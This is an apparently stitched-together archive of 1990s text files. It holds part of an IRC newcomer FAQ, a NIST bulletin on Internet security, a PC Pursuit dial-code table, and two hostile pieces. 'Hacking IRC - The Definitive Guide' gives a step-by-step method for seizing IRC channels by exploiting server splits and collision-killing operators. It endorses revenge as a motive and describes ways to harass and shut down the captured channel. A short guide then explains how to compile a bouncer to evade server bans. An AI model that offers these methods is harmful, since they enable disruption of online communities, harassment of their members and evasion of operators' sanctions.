"hello!". You don't have to type <nickname> hello! because IRC will
insert <nickname> before all of your channel messages.
When you choose to leave a channel, just type /part #channelname
(10) What is a channel operator? What is an IRC operator?
.A channel operator is someone with a "@" by their nickname in
a /names list, or a "@" by the channel name in /whois output. Channel
operators are kings/queens of their channel. This means they can kick
you out of their channel for no reason. If you don't like this, you
can start your own channel and become a channel operator there.
.An IRC operator is someone who maintains the IRC network. They
cannot fix channel problems. They cannot kick someone out of a channel
for you. They cannot /kill (kick someone out of IRC temporarily)
someone just because you gave the offender channel operator privileges
and said offender kicked *you* off.
(11) What is a "bot"?
"bot" is short for "robot". It is a script run from an ircII
client or a separate program (in perl, C, and sometimes more obscure
languages). StarOwl@uiuc.edu (Michael Adams) defined bots very well: "A
bot is a vile creation of /lusers to make up for lack of penis length".
IRC bots are generally not needed. See (14) below about "ownership" of
nicknames and channels. A bot generally tries to "protect" a channel (it
should be noted that all bots will fail at some point, so relying on them
to keep a channel is not a good idea) from takeovers.
.It should be noted that many servers (especially in the USA)
ban ALL bots. Some ban bots so much that if you run a bot on their server,
you will be banned from using that server (see segment below on K: lines).
(12) What are good channels to try while using IRC?
.#hottub and #riskybus are almost always teeming with people.
#hottub is meant to simulate a hot tub, and #riskybus is a non-stop
game. Just join to find out!
.To get a list of channels with their names and topics, do
/list -min 30 (on ircII) which will show you channels with 30 or more
members. You can also do this for smaller numbers.
.Many IRC operators are in #Twilight_Zone ... so if you join
that channel and don't hear much talking, don't worry, it's not because
you joined, operators don't talk much on that channel anyways!
(13) What are some of the foreign language channels on IRC? What do they
mean?
.Some of the most popular foreign language channels include #42
(which is a Finnish channel), #warung (which is a Malaysian channel. The
word "warung" means "coffeehouse" or "small restaurant"), #polska (a
Polish channel), #nippon (a Japanese channel, note that "funny" characters
are often seen here -- this is Kanji. You will need a Kanji-compatible
terminal program and Kanji-compatible irc client to converse in Kanji),
#espanol (a Spanish channel), #russian (a Russian channel).
.These are just examples -- a large percentage of languages in the
world is spoken on irc *somewhere*. If your language/country isn't listed
above, ask on #irchelp to see if there is a channel for it.
(14) Someone is using my nickname, can anyone do anything about it?
Someone is using my channel, can anyone do anything about it?
Even while NickServ (see (17) below) registered nicknames, there
are not enough nicknames to have nickname ownership. If someone takes
your nickname while you are not on IRC, you can ask for them to give it
back, but you can not *demand* it, nor will IRC operators /kill for
nickname ownership.
There are, literally, millions of possible channel names, so if
someone is on your usual channel, just go to another. You can /msg them
and ask for them to leave, but you can't *force* them to leave.
(15) There aren't any channel operators on my channel, now what?
Channel operators are the owner(s) of their respective channels.
Keep this in mind when giving out channel operator powers (make sure to
give them to enough people so that all of the channel operators don't
unexpectedly leave and the channel is stuck without a channel operator).
On the other hand, do not give out channel operator to
*everyone*. This causes the possibility of mass-kicking, where the
channel would be stuck without any channel operators.
.You have one option. You can ask everyone to leave and rejoin
the channel. This is a good way to get channel operator back. It
doesn't work on large channels or ones with bots, for obvious reasons.
(16) What if someone tells me to type something cryptic?
.Never type anything anyone tells you to without knowing what it
is. There is a problem with typing certain commands with the ircII
client that give anyone immediate control of your client (and thus can
gain access to your account).
(17) What was NickServ? Is NickServ ever coming back?
.NickServ was a nickname registration service run in Germany. It
was a bot that told people who used a registered nickname to stop using
that nickname. NickServ has been down since the Spring of 1994.
.It is not likely that NickServ will be back.
.Remember, nicknames aren't owned.
(18) What does "*** Ghosts are not allowed on IRC." mean?
What does "*** You are not welcome on this server." mean?
.On IRC, you cannot be banned from every single server.
Server-banning exists only on a per-server basis (being banned on one
server does not mean you are automatically banned from another). "Ghosts
are not allowed on IRC" means that you are banned from using that server.
The banning is in one of three forms:
* You are banned specifically, you yourself. Only you can be responsible
for this (if you are using a shared account, this obviously does not
apply). Thus the responsibility lies completely with you and you have
no one to complain to.
* Your machine is banned. Chances are it wasn't you who committed the
wrongdoing. Try using another machine on campus and seeing if you can
use that particular irc server then.
* Your whole site is banned (where "site" == "school", "company",
"country"). This almost certainly wasn't your fault. And chances are
you won't be able to get the server-ban lifted. Try using another
server.
.The most general answer is "use another server", but if it bothers
you, try writing to the irc administrator of that site -->
/admin server.name.here -- plead your case. It might even get somewhere!
(19) What does "You have new email." mean? What does it mean when I see
"[Mail: 5]" in my status bar?
.IRC does not have its own mail. However, if your client tells you
that you have new email, it simply means that you have received mail in
your account. Leave irc (either by suspending it or quitting it), and read
the mail.
.You might also see "You have new email." when you start irc. IRC
does not keep track of email between sessions, so when you start irc and
have something in your mailbox, irc will tell you you have new email.
.The "[Mail: 5]" in your status bar tells you how many email
messages you have in your mailbox. Again, to access them, leave irc and
read them using your normal mail reader.
(20) I've just tried typing /list but it scrolls by so fast! How can I
slow it down to something more my pace?
.The standard ircII client (for UNIX) has an option called "hold
mode". To activate it, type: /set hold_mode on -- then you will be able
to hit return after each screen's worth of data.
(21) I've done a /whois on myself and other people, but I notice that my
real name shows up in parentheses -- I don't like this! It doesn't
show up in other people's parentheses. How can I change it?
.In UNIX, there are two way of changing your IRCNAME and it depends
on which shell you are using. If you are using csh or tcsh (the more
popular UNIX shells, when in doubt, try this first), type this before you
start irc:
setenv IRCNAME "what you would like to appear"
If you don't want to type that every time you log in, put the line exactly
as it appears above into your .cshrc file.
If you are using sh, ksh, or bash, type this before you start irc:
IRCNAM
+356
View File
@@ -0,0 +1,356 @@
Submitted by: Weasel
Here is a something about hacking irc. If you like it put it if not then
don't. I think you'll like it though.Good page by the way. Very nice.
Nice layout and everything. i think you should try to make a listing of
good bbs' and hacking programs. If you have already done so. Sorry, I
must have missed them. Good JOb.
Weas
Hacking IRC - The Definitive Guide
Welcome to Hacking IRC- The Definitive Guide. The purpose of this page
if
you have not already guessed is to provide what I consider optimal
methodology for hacking IRC channels. In addition, I provide some of the
better channels to hack as well as fun things to do while "owning a
channel."
Contents
* Section 1-- Why Hack IRC?
* Section 2--Requisite Tools
* Section 3--What It Takes To Gain Control
* Section 4--Link Looker(LL)
* Section 5--Bots and Scripts
* Section 6--Multi-Collide-Bot(MCB)
* Section 7--Pre-Takeover Preparation
* Section 8--Thing To Do ONce You "Own" the Channel
* Section 9--Best Channels to Hack
[Image] See me if you dare.
Section 1-Why Hack IRC?
I have often asked myself this question and the answers are varied and
numerous. One of the primary reasons for hacking IRC channels is due to
shear boredom. However a multitude of secondary reasons exist. Foremost
among these is the "that asshole op insulted me and/or kicked me and/or
banned me from the channel and I WANT REVENGE! This is a perfectly valid
excuse and boredom is not a necessary condition for implementing a
takeover
of an IRC channel. Nor is it a necessary condition that the reason you
were
insulted and/or kicked and/or banned was because in fact you are an
asshole.
All that is necessary is the will, the desire, a bit of skill, and of
course
the tools, which convieniently brings me to my next section.
Section 2-Requisite Tools
Any decent craftsmen needs a good set of tools and IRC hackers are no
exception. Without the proper tools you are dead in the water. All of
the
tools I describe below are available on public ftp sites. Before I
launch
into a discussion of what you will need, it is important to point out
that
if you are reading this document from your ppp/slip account you might
consider geeting a shell account if you are serious about hackin.
Hacking
IRC from a slip/ppp is much more complicated than doing so from a shell
account. There are those who will debate this but my experience has
shown
that mIRC or any of the other shareware IRC programs for the PC are no
match
for the speed and ease of use that an IRC shell script allows for. Thus
the
first tool required for hacking is an excellent irc shell script. If you
have already used IRC via a shell account and are still reading this
document you probably already have a script, which means you are well on
your way! As far as IRC shell scripts go, my personal favorite is Lice -
again available publically via FTP. Other scripts exist but the richness
and
power of the LICE commands I believe is second to none. Now while it is
possible to stop here and hack ops with just a script, you would
effectively
be putting yourself needlessly at a handicap. Therefore I reccommend
these
additional two tools: 1)Multi-Collide-Bot(MCB) and 2)LInk Looker(LL).
These
two C programs are your infantry and intelligence respectively. Again
both
are available via FTP and both are C programs and therefore need to be
compiled.
What It Takes To Gain Control
Without going into much detail clearly in order to effectively gain
control
of an IRC channel you must be the only op on your channel. If you are
still
clueless at this point, that is to say..You should be the only guy/gal
with
the @ in front of your nick. Once you have accomplished this, the
channel is
YOURS. Of course, that is until it is taken back or you decide to cease
hacking the channel. There are a number of ways to effectively gain ops
on a
channel and I will start with the simplest, then move to the
increasingly
more complex and finesse laden methods. By far and away the easiet
method of
gaining ops on a channel is to ask. You laugh eh? Well don't. Clearly as
hackers grow more prevelant on IRC the asking method becomes more and
more
unlikely to succeed. This is especially true of the bigger and well
established channels that have cultures onto themselves such as #Netsex,
#Teensex, #Windows95, #Bawel, #BDSM, #Blaklife, #Texas, #Hack, and any
of
the #Warez channels and a whole host of others. To gain ops in these
channels you must become a channel regular (i.e. one that hangs there
freqently and becomes a known and trusted member of the channel). Since
you
have neither the time nor the desire to make friends on the channel you
ultimately want to hack ops on, the asking method is the last thing you
want
to do on all but the smaller more ethereal channels, where you obviously
stand a better although still slim chance of gaining ops through a
request..
One important exception to the ask method is through the use of anonirc
which can be used on any channel but has severe limitations..more on
this
later. But of course you didn't come this far to be taught how to ask
for
ops..so lets proceed with the next lesson. Aside from asking there are
essentially two other ways of gaining ops. The first is through splits
and
the second is through anonirc. The following discussion mostly relates
to
splits but I will touch on anonirc briefly at the end. What is a split?
A
split occurs when the IRC server you are communicating on detaches from
the
rest of the net. If you are in a channel and by chance the only one on a
particular server that splits away, you will not only find yourself
alone on
the channel, but will now have the opportunity to gain ops. In order to
do
this you need to leave and rejoin the channel in which case you will now
find yourself with the little @ in front of your nick. When your server
rejoins you will have ops on the channel. Now you say, "Wow, thats easy
enough". Wrong. More likely than not, especially on a bigger channel a
number of things are likely to occur that will remove your op status.
Remember now the goal here is to keep ops so you can "Have Your Way".
Also
and more importantly, if you go into a channel and wait around hoping
the
server you are on splits, you might grow old and die first. Therefore,
what
is a wannbe IRC hacker to do? Link Looker is your answer.
Link Looker
Link Looker is a lovely little program that acts as your intelligence
officer. Without getting into the complexities or its mechanics, what it
effectively does is to give your a message anytime a particular server
detaches from the net and a message when it rejoins. Is the methodology
becoming clearer now? Yes! Thats right! When LL tells you that a server
is
split ,you connect to that server and join the channel you seek to hack
ops
on and hope nobody else split from the channel on that server(if this
occurs
you will not get ops).. If you find yourself alone, you will have ops
and a
fighting chance to gain control of the channel. It is important to
realize
that on many channels, just getting ops via a split and waiting for a
rejoin
is sufficient for gaining control of a channel. This is particularly
true of
small to medium sized channels as well as channels that are not
organized or
do not have Bots (more on this later), You simply wait for the server to
rejoin and once the channel is full you execute your mass deop command
(this
is on your script and the key element in getting rid of any other ops)
and
you will be the only op left. The channel is yours and go do your thing!
On
bigger more organized channels, things won't be so easy due to the
presense
of Bots as well as the presense of scripts used by existing human ops.
Bots and Scripts
Bigger more organized channels inevitably have a Bot(Robot) or multiple
Bots. Bots are essentially suped up scripts that attempt to maintain ops
on
a channel by their continuous presensce on channel. Additionally Bots
provide a number of channel maintenance tasks such as opping known
members
of the channel (either automatically or through password requests),
providing notes, and other information. Bots however are primarlly used
for
keeping ops on channel and depending on the type of Bot, defending
against
IRC hackers. Bots come in many varieties and types but the best of them
do a
good job of deoping spliters(thats you silly..you are opped on a split
and
when you rejoin the bot will deop you). Not only will Bots deop
you..many of
the human ops have scripts (such as LIce) that depending on the settings
employed will deop you as well. Now with the prevalance of powerful
scripts
on IRC a recent phenomona is the occurse of the desynch. This is a nasty
event that takes place when you rejoin from a split and your script
deops
the existing ops and the existing ops deop you at the same time. What
this
does is confuse the shit out of the servers and cause them to
desynchronize
from one another. This is to be avoided at all costs. When this happens
you
will effectively become desynched from a large portion of the net and
most
the channel, (depending on what server you rode in on). What's worse is
that
you will think you have ops( which you will for that server) but in
reality
you won't and you will be wasting your time. So how with the prevalence
of
super Bots and Human ops with scripts do you take the channel? Using MCB
of
course!
Multi-Collide-Bot(MCB)
Multi-Collide-Bot (MCB) is a powerful tool and your best friend. MCB is
an
even lovelier program that creates a clone of a nick you want to kill
(almsot always an op on the channel you are trying to hack) on a server
that
has split(yes the one Link Looker informed you of). Basically you feed
MCB
the name or names of the nick you want to kill and tell it what split
server
to establish those clones and upon rejoin.BAM/SMACK/KIILL!! Yes thats
right,
the target is thrown out of the channel(losing ops) and must
re-establish a
connection with a server to get back onto IRC and into the channel. So
yes,
you have figured it out. If you kill all of the ops on a channel and you
ride in on a split you will be the only op in the channel. Let me assure
you
there is nothing like seeing the nick kill messages of the ops you have
targeted as you ride in on the split.
Pre-Takeover Preparation
There are a number of things you can do before you attempt to take over
an
IRC Channel to make things easier and be as well prepared as you can
possibly be. 1)Pre-Attack Observation. Plain and simple you must know
who
you are attacking. One of the most important things you can do as you
sit
and observe the channel is to determine which bots and/or human ops are
deopping on rejoins. These are the nicks you want to target first. You
will
fail if you don't kill these nicks and rejoin because you are likely to
cause a desynch(discussed above). However, it is essential to make sure
you
kill all of the ops. Leaving just one op alive means you have lost that
battle and must now regroup and wait for another split. It is important
to
watch out for ops changing their nicks if they detect a split. If they
do
this, the mcb you tagged with their nick will be useless to you. The way
I
prevent this is to be on both sides of the split. That is to be opped in
the
channel on the split server and have a clone in the channel on the other
side of the split monitoring the goings on, telling you if ops change
nicks
or new people are opped (in which case you create a new mcb with their
name
on it).
Things To Do Once You "Own" the Channel
Once you own the channel, the decision is clearly yours on how you want
to
proceed and needless to say the number of things you can do is endless.
However, let me share with you a number of time tested ideas that are
sure
to give you a thrill not to mention totally piss of the channel you have
now
hacked. The first thing you can do is to taunt the former ops of the
channel. That is to say, they will probably be cursing you and telling
you
what a loser you are for hacking the channel. They will say things like
"get
a life, do something more productive". Remember don't take it
personally.
You have to keep in mind that it is the formers ops who in fact are the
ones
who need to get a life, considering the only power they have or make
that
had (if you successfully hacked the channel) was to have ops in the
first
place. So you can continue to taunt and if they get relay billegerent
you
can kick them off the channel. They will undoubtedly come back within a
second or two and then you can say something like, "Now, now I am in
control
of the channel and I will not tolerate such language and behavior. If
you
are unable to control yourself I will be forced to ban you." Now this is
sure to get some violent response from the former op in which case you
subsequently kick and ban them and move onto the next person. Another
thing
I like to do is to word ban. This is particularly easy if you have LICE.
What you do is pick a word that if typed onto the screen by any of the
channel members, will automatically result in you kicking them off the
channel with the reason that word is banned. This method is particularly
good in channels like #teensex where people are always saying the word
sex,
male, female, teen, age, etc. All you do is ban those words and watch
the
kicks begin to fly. Another thing I like to do is moderate the channel.
What
this does with the /mode +m command is to make it such that nobody on
channel can speak. This is a particularly good thing to do when many of
the
channel members are getting out of hand and you want to make some sort
of
statement without anybody interrupting you. Yes all eyes will be trained
on
you. If you want to be really mean, when you are finished hacking the
channel, you can leave it moderated in which case nobody will be able to
speak and the channel is effectively shut down. Other things to do which
are
nasty as well are to kick everybody out of the channel and make it
invite
only, effectively shutting it down as well. Think of your own creative
things to do. I would love to hear about them..email me..if they are
particularly interesting I will include them in this page with an
attribution if you like.
+40
View File
@@ -0,0 +1,40 @@
//------------------------------------------------\\
|| Irc Bouncing Around Klines Using a unix Shell ||
|| By: Lord Somer(webmaster@lordsomer.com) ||
|| on August 5, 1997 ||
|| For: The Hackers Layer ||
|| http://www.lordsomer.com ||
|| and ||
|| The Hackers Club ||
|| http://www.hackersclub.com/km/index.html ||
\\------------------------------------------------//
Reqs:
1 Shell Account
ftp access to upload the file
http://www.ilf.net/LordSomer/files/csource/IRCBNC.C
Installation/Configuration:
The 3 Lines listed below must be configured inside the .c file.
#define IRCSERV "irc.netsys.com"
(server you want to bounce on to)
#define IRCPORT 6667
(port of the server you want to bounce to)
#define IRCBNC 5000
(port on your shell server you want to use to connect to for bouncing)
Once they are defined just ftp up the file.
Telnet in and cd to the dir you up'd it to type:
cc -o ircbnc IRCBNC.C
if that gives errors
rename IRCBNC.C to ircbnc.c
and at the prompt type
cc -O -s ircbnc.c -o ircbnc
then to run it type
./ircbnc
to bounce you just go to your irc client and type
/server shell.server.com portyoudefinedinircbnc.c
and it'll bounce you over to the server you defined with your host
being the shells host.
Enjoy and stop by #warez.somer on efnet if ya need me
+323
View File
@@ -0,0 +1,323 @@
CSL BULLETIN
July 1993
CONNECTING TO THE INTERNET: SECURITY CONSIDERATIONS
This bulletin focuses on security considerations for organizations
considering Internet connections. Spurred by developments in high-
speed networking technology and the National Research and Education
Network (NREN), many organizations and individuals are looking at
the Internet as a means for expanding their research interests and
communications. Consequently, the Internet is now growing faster
than any telecommunications system thus far, including the
telephone system.
New users of the Internet may fail to realize, however, that their
sites could be at risk to threats such as intruders who use the
Internet as a means for attacking systems and causing various forms
of computer security incidents. Consequently, new Internet sites
are often prime targets for malicious activity, including break-
ins, file tampering, and service disruptions. Such activity may be
difficult to discover and correct, may be highly embarrassing to
the organization, and can be very costly in terms of lost
productivity and damage to data.
New and existing Internet users need to be aware of the high
potential for computer security incidents from the Internet and the
steps they should take to secure their sites. Many tools and
techniques now exist to provide sites with a higher level of
assurance and protection.
The Internet
The Internet is a world-wide "network of networks" that use the
TCP/IP protocol suite for communications. The component networks
are interconnected at various points to provide multiple routes to
destinations and a high level of overall service to users. Many
academic, business, and government organizations are connected to
the Internet. In 1993, over five million users were connected,
with roughly half being business users.
The Internet provides several types of services, including terminal
emulation and remote system access (telnet), file exchange (ftp),
electronic mail (smtp), and a number of other services for
information exchange.
As outlined in CSL Bulletin TCP/IP or OSI? Choosing a Strategy for
Open Systems, NIST advises that agencies procure Open Systems
Interconnect (OSI) networking products for new network
implementations and for multivendor information exchange. At the
same time, it is practical for agencies to consider connections to
the Internet for the purpose of exchanging e-mail and files with
the large number of existing Internet sites.
Security Problems on the Internet
In recent years, a number of security problems with the Internet
have become apparent. Newspapers have carried stories of high-
profile "cracker" attacks via the Internet against government,
business, and academic sites. Crackers often roam the Internet
with impunity, covering their tracks by moving from system to
system. Intruders have been known to use systems illegally to
exchange copyrighted software, to obtain sensitive information such
as business secrets, and in general to cause mischief. System
administrators are often unaware of break-ins and unauthorized
users until they learn by accident. A number of factors have
contributed to this state of affairs.
Complexity of Configuration: Many sites connect systems to the
Internet with little thought to the complexity of system
administration and the increased potential for abuse from the
Internet. New systems often arrive "out of the box" with network
access controls configured for maximum, i.e., least secure, access.
The access controls are usually complex to configure and monitor.
As a result, controls that are accidentally misconfigured can
result in unauthorized access.
Ease of Spying and Spoofing: The vast majority of Internet traffic
is unencrypted and therefore easily readable. As a result, e-mail,
passwords, and file transfers can be monitored and captured using
readily available software. Intruders have been known to monitor
connections to well-known Internet sites for the purpose of gaining
information that would allow them to crack security or to steal
valuable information. This information sometimes permits intruders
to spoof legitimate connections, i.e., trick system security into
permitting normally disallowed network connections.
Inherent Problems with TCP/IP Protocols: The TCP/IP protocol
suite, as implemented in the Internet, does not contain provisions
for network security. A number of the TCP/IP services, e.g.,
rlogin, rsh, etc., rely on mutually trusting systems and are
inherently vulnerable to misuse and spoofing. Ironically, some of
these services, e.g., nis and nfs, are widely used to coordinate
local area network security and to distribute system resources
among other local systems. If the vulnerabilities in these
services are exploited, security on the local area network could be
badly compromised.
Wide-Open Network Policies: Many sites are configured
unintentionally for wide-open Internet access without regard to the
potential for abuse from the Internet. Some systems still employ
password-less guest accounts or anonymous ftp accounts that can be
written to without restriction. Others keep sensitive information
on network-accessible systems where it can be easily read. The
vast majority of sites permit more TCP/IP services than they
require for their operations and do not attempt to limit access to
information about their computers that could prove valuable to
intruders.
Recommendations for New and Existing Internet Connections
New and existing Internet sites need to take strong and specific
measures to improve computer security. These measures include
creating a TCP/IP service access policy, using strong
authentication, and using a secure Internet gateway that can imple-
ment network access policies.
ÉÍÍÍÍÍÍÍÍÍÍÍÍþService Access PolicyþÍÍÍÍÍÍÍÍÍÍÍÍ»
º ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ º
º ³ ³ º
º ³ Local ³ ÚÄÄÄÄÄÄÄÄÄÄ¿ º
º ³ Area ³ strong ³ Secure ÃÄ×Äþ INTERNET
º ³ Network ³authentication³ Gateway ÃÄ×Äþ OSI WANs
º ³ Systems ³ ÀÄÄÄÄÄÄÄÄÄÄÙ º
º ³ ³ º
º ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ º
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
Network Service Policy: The first step is to create a policy that
details what types of connectivity will be permitted. If, for
example, e-mail is the only service required, then other forms of
access such as telnet and ftp can be restricted and overall risks
reduced. Eliminating the TCP/IP services that are not needed will
help to provide a simpler, more manageable network environment.
The following figure is a partial list of TCP/IP services that
should be restricted or blocked from passing through a site's
Internet gateway:
High-Risk TCP/IP Services
DNS zone transfers leaks names of internal
systems tftp intruders can read
password file RPC (eg., NIS,
NFS) intruders can read/write
files rlogin, rsh, etc. relies on mutually
trusting systems X windows,
OpenWindows intruders can monitor
users' sessions telnet, ftp, smtp can be abused, access
should be re-
stricted to selected
systems
Strong Authentication: Systems that can be accessed from the
Internet or via modem should require strong authentication such as
provided by smart cards and authentication tokens. These systems
use one-time passwords that cannot be spoofed, regardless of
whether the passwords are monitored. CSL Bulletin Advanced
Authentication Technology contains more information on strong
authentication techniques.
Secure Gateways: Secure gateways, or firewalls, are highly
effective for improving site network security. A secure gateway is
a collection of systems and routers placed at a site's central
connection to a network whose main purpose is to restrict access to
internal systems. A secure gateway forces all network connections
to pass through the gateway where they can be examined and
evaluated. The secure gateway may then restrict access to or from
selected systems or block certain TCP/IP services or provide other
security features. A simple network usage policy that can be
implemented by a secure gateway is to provide access from internal
to external systems, but little or no access from external to
internal systems (except perhaps for e-mail).
For small sites, a simple router with packet-filtering capability
may serve as an effective gateway. This type of router can
typically restrict access to selected systems and services by
examining each packet according to a sequence of filtering rules.
A more flexible and robust approach is to combine the router with
other systems capable of logging network access and restricting
access and services on a finer basis. Some secure gateways
implement proxy services that require all ftp or telnet connections
to be first authenticated at the gateway before being allowed to
continue.
Without a secure gateway, a site's security depends entirely on the
collective security of its individual systems. As the number of
systems increases, it becomes more difficult to ensure that network
security policies are enforced. Errors and simple mistakes in one
system's configuration can cause problems for other interconnected
systems.
Securing Modem Pools: Unrestricted incoming and outgoing modem
pools (including PABX systems) can create backdoors that would let
intruders get around the access controls of secure gateways. Modem
pools need to be configured to deny access to unauthorized users.
Systems that can be accessed from modem pools should require strong
authentication such as one-time passwords. Modem pools should not
be configured for outgoing connections unless access can be
carefully controlled.
Securing Public Access Systems: Public access systems such as
anonymous ftp archives are often prime targets for abuse. Such
systems, if misconfigured to allow writing, can permit intruders to
destroy or alter data or software, which can prove highly
embarrassing to the organization. CSL Bulletin Security Issues in
Public Access Systems provides guidance on securing public access
systems.
System Security Tools: The existence of a secure gateway does not
negate the need for stronger system security. Many tools are
available for system administrators to enhance system security and
provide additional audit capability. Such tools can check for
strong passwords, log connection information, detect changes in
system files, and provide other features that will help
administrators to detect signs of intruders and break-ins.
Keeping Up-to-Date
Sites need to be aware of other resources and information that will
permit them to update site security as new vulnerabilities are
discovered and as new tools and techniques to improve security
become available. In particular, sites need to know who to contact
when trouble arises.
Vendor Support: Several system vendors now regularly distribute
software update notifications and related security information via
e-mail. Customers need to contact vendors and determine whether
they can receive such information.
Incident Handling Teams: A number of vendors, other businesses,
and government-affiliated organizations have created computer
security incident handling teams. These groups typically provide
assistance in determining whether an incident has occurred and how
to correct any vulnerabilities that were exploited. NIST helps to
coordinate the Forum of Incident Response and Security Teams
(FIRST). FIRST provides guidance and overall coordination of teams
and incident handling information. For more information about
incident response teams and FIRST, contact NIST (see below).
For More Information
NIST will be issuing more guidance on open systems security and on
secure gateways. For more information on Internet security and
other computer security issues, contact the National Institute of
Standards and Technology at the following address: NIST, Building
225, Room A-216, Gaithersburg, MD 20899-0001; telephone (301) 975-
3359; fax (301) 948-0279.
NIST also maintains a computer security bulletin board system (BBS)
and Internet-accessible site for computer security information open
to the public at all times. These resources provide information on
computer security publications, CSL Bulletins, alert notices,
information about viruses and anti-virus tools, a security events
calendar, and sources for more information.
To access the BBS, you need a computer with communications
capability and a modem. For modems at 2400 bits per second (BPS)
or less, dial (301) 948-5717. For 9600 BPS, dial (301) 948-5140.
Modem settings for all speeds are 8 data bits, no parity, 1 stop
bit.
Internet users with telnet or ftp capability may telnet to the BBS
at cs-bbs.nist.gov (129.6.54.30). To download files, users need to
use ftp as follows: ftp to csrc.nist.gov (129.6.54.11), log into
account anonymous, use your Internet address as the password, and
locate files in directory pub; an index of all files is available
for download. For users with Internet-accessible e-mail
capability, send e-mail to docserver@csrc.nist.gov with the
following message: send filename, where filename is the name of
the file you wish to retrieve. send index will return an index of
available files.
References
The sources used to develop this bulletin provide excellent
resources for further information on Internet security and related
topics. Ordering information is provided when appropriate. All
references except [1] and [6] are available from the NIST BBS or
via ftp.
[1] Cerf, Vinton, "A National Information Infrastructure,"
Connexions, June 1993.
[2] "TCP/IP or OSI? Choosing a Strategy for Open Systems," CSL
Bulletin, National Institute of Standards and Technology, June
1992.
[3] Bellovin, Steve, "Security Problems in the TCP/IP Protocol
Suite," Computer Communication Review, April 1989.
[4] Holbrook, Paul, and Joyce Reynolds, "Site Security Handbook,"
RFC 1244 prepared for the Internet Engineering Task Force,
1991.
[5] "Advanced Authentication Technology," CSL Bulletin, National
Institute of Standards and Technology, November 1991.
[6] Curry, David, Unix System Security, Addison Wesley, 1992.
[7] Ranum, Marcus, "Thinking About Firewalls," Proceedings of
Second International Conference on System and Network
Security, April 1993.
[8] "Security Issues in Public Access Systems," CSL Bulletin,
National Institute of Standards and Technology, May 1993.
[9] Polk, W. Timothy, Automated Tools for Testing Computer System
Vulnerability, NIST Special Publication 800-6, National
Institute of Standards and Technology, December 1992. Order
from GPO, 202-783-3238, SN003-003-03189-9, or NTIS, 703-487-
4650, PB93-146025.
[10] Wack, John, Establishing A Computer Security Incident Response
Capability, NIST Special Publication 800-3, National Institute
of Standards and Technology, November 1991. Order from NTIS,
703-487-4650, PB92-123140.
X-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-X
Another file downloaded from: The NIRVANAnet(tm) Seven
& the Temple of the Screaming Electron Taipan Enigma 510/935-5845
Burn This Flag Zardoz 408/363-9766
realitycheck Poindexter Fortran 510/527-1662
Lies Unlimited Mick Freen 801/278-2699
The New Dork Sublime Biffnix 415/864-DORK
The Shrine Rif Raf 206/794-6674
Planet Mirth Simon Jester 510/786-6560
"Raw Data for Raw Nerves"
X-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-X
+219
View File
@@ -0,0 +1,219 @@
PC Pursuit Service Availability
--------------------------------
PC Pursuit can be used to access local numbers in the
following cities. Note that not all exchanges in a
given area code are accessible via PC Pusuit! For a
list of exchanges in the individual cities,
please see the exchange lists.
Example of use:
C D/DCWAS/12,<id>,<pw>
City Code City Entries
-------------------------- ---- -------------
Ann Arbor, MI 313 D/MIAAR/12
D/MIAAR/24
Atlanta, GA 404 D/GAATL/3
D/GAATL/12
D/GAATL/24
Austin, TX 512 D/TXAUS/12
D/TXAUS/24
Boston, MA 617 D/MABOS/3
D/MABOS/12
D/MABOS/24
Chicago, IL 312 \ D/ILCHI/3
708 > D/ILCHI/12
815 / D/ILCHI/24
(for 708, must use 1708 + phone number)
(for 815, must use 1815 + phone number)
Cleveland, OH 216 D/OHCLE/3
D/OHCLE/12
D/OHCLE/24
Colton, CA 714 \ D/CACOL/3
> D/CACOL/12
909 / D/CACOL/24
(for 909, must use 1909 + phone number)
Columbus, OH 614 D/OHCOL/12
D/OHCOL/24
Dallas, TX 214 \ D/TXDAL/3
> D/TXDAL/12
817 / D/TXDAL/24
(for 817, must use 817 + phone number)
Denver, CO 303 D/CODEN/3
D/CODEN/12
D/CODEN/24
Detroit, MI 313 D/MIDET/3
D/MIDET/12
D/MIDET/24
Glendale, CA 818 \ D/CAGLE/3
310 > D/CAGLE/12
213 / D/CAGLE/24
(for 213, must use 1213 + phone number)
(for 310, must use 1310 + phone number)
Hartford, CT 203 D/CTHAR/3
D/CTHAR/12
D/CTHAR/24
Hempstead, NY 516 D/NYHEM/12
D/NYHEM/24
Houston, TX 713 D/TXHOU/3
D/TXHOU/12
D/TXHOU/24
Indianapolis, IN 317 D/ININD/12
D/ININD/24
Kansas City, MO 816 \ D/MOKCI/3
> D/MOKCI/12
913 / D/MOKCI/24
Los Angeles, CA 213 \ D/CALAN/3
310 > D/CALAN/12
818 / D/CALAN/24
(for 818, must use 1818 + phone number)
(for 310, must use 1310 + phone number)
Miami, FL 305 D/FLMIA/3
D/FLMIA/12
D/FLMIA/24
Milwaukee, WI 414 D/WIMIL/3
D/WIMIL/12
D/WIMIL/24
Minneapolis, MN 612 D/MNMIN/3
D/MNMIN/12
D/MNMIN/24
Newark, NJ 201 \ D/NJNEW/3
> D/NJNEW/12
908 / D/NJNEW/24
(for 908, must use 1908 + phone number)
Memphis, TN 901 \ D/TNMEM/12
601 / D/TNMEM/24
(for 601, must use 1601 + phone number)
New Brunswick, NJ 908 \ D/NJNBR/12
201 / D/NJNBR/24
(for 201, must use 1201 + phone number)
New Orleans, LA 504 D/LANOR/12
D/LANOR/24
New York, NY 212 \ D/NYNYO/3
516 \ D/NYNYO/12
718 / D/NYNYO/24
914 /
(for 516, must use 1516 + phone number)
(for 718, must use 1718 + phone number)
(for 914, must use 1914 + phone number)
Oakland, CA 415 \ D/CAOAK/3
> D/CAOAK/12
510 / D/CAOAK/24
(for 415, must use 1415 + phone number)
Orlando, FL 407 D/FLORL/12
D/FLORL/24
Palo Alto, CA 415 \ D/CAPAL/3
408 > D/CAPAL/12
510 / D/CAPAL/24
(for 408, must use 1408 + phone number)
(for 510, must use 1510 + phone number)
Philadelphia, PA 215 D/PAPHI/3
D/PAPHI/12
D/PAPHI/24
Phoenix, AZ 602 D/AZPHO/3
D/AZPHO/12
D/AZPHO/24
